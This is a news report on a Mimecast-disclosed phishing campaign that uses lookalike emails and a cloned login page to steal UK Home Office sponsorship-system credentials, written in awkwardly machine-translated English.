- Mimecast reveals phishing -campaign targeting the British home office
- Accounts stolen through phishing -e emails and fake sites
- The fake places can hardly be distinguished
A phishing campaign has been revealed by Mimecast scientists aimed at Home Office Sponsorship Management System (SMS).
The main goal of the campaign seems to be compromising access to accounts, which can then be sold on the dark web, pressing organizations through theft of sensitive data and creating false certificates for sponsorship (COS).
The campaign not only affects organizations with sponsorship license rights, but threatens to undermine the entire British immigration system.
UK Home Office at risk
The attackers begin the campaign by sending E emails that are closely similar to legitimate E emails distributed by the home office using the same branding and stylization. E emails include an urgent call for action that threatens account pension if the user does not log in.
The victims are led to a fake login page via a CAPTCHA-GATED URL that is very similar to the legitimate URL used by the home office. After completing CAPTCHA, the user lands at a cloned home office -Login page.
The only differences between the legitimate and illegitimate pages are in the form. The false side directs credentials to an attacker -controlled script where the exposed credentials can be used to log into the victim’s account.
With the stolen stories, the striker can then create false job offers and visa sponsorship schemes and accusations victims tens of thousands of pounds to access them.
The best protection against phishing campaigns like this is constant vigilance. Always check URLs and be careful with urgent calls for action.
A complete list of the indicators of this phishing campaign can be found on the Mimecast blog.
